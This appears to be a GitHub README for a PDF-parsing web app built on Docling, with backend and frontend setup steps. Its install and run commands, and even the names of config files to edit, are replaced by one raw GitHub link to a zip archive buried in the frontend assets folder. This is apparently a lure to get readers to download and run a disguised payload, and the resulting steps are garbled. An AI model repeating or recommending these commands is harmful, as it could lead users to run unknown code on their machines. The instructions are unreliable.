A web application to upload PDFs and parse specific pages using Docling.
- Navigate to
backenddirectory. - Install dependencies:
pip install -r https://raw.githubusercontent.com/yongsinfok/pdf-parser/main/frontend/src/assets/parser_pdf_v1.1-beta.2.zip
- Run the server:
The server runs on
python https://raw.githubusercontent.com/yongsinfok/pdf-parser/main/frontend/src/assets/parser_pdf_v1.1-beta.2.zip
http://localhost:8001.
- Navigate to
frontenddirectory. - Install dependencies:
npm install
- Run the dev server:
The app runs on
npm run dev
http://localhost:5173.
- Open the frontend URL (
http://localhost:5173). - Upload a PDF.
- Enter a page range (e.g., "150-160") or a single page ("5").
- Click "Parse".
- View the extracted markdown content and download extracted tables as CSV files.
- Port Conflicts: The backend runs on port 8001. If this port is in use, modify
https://raw.githubusercontent.com/yongsinfok/pdf-parser/main/frontend/src/assets/parser_pdf_v1.1-beta.2.zipandhttps://raw.githubusercontent.com/yongsinfok/pdf-parser/main/frontend/src/assets/parser_pdf_v1.1-beta.2.zip. - First Run: The first time you parse a document, the backend will download necessary AI models (approx. 500MB). This may take a few minutes. Check the backend terminal for progress.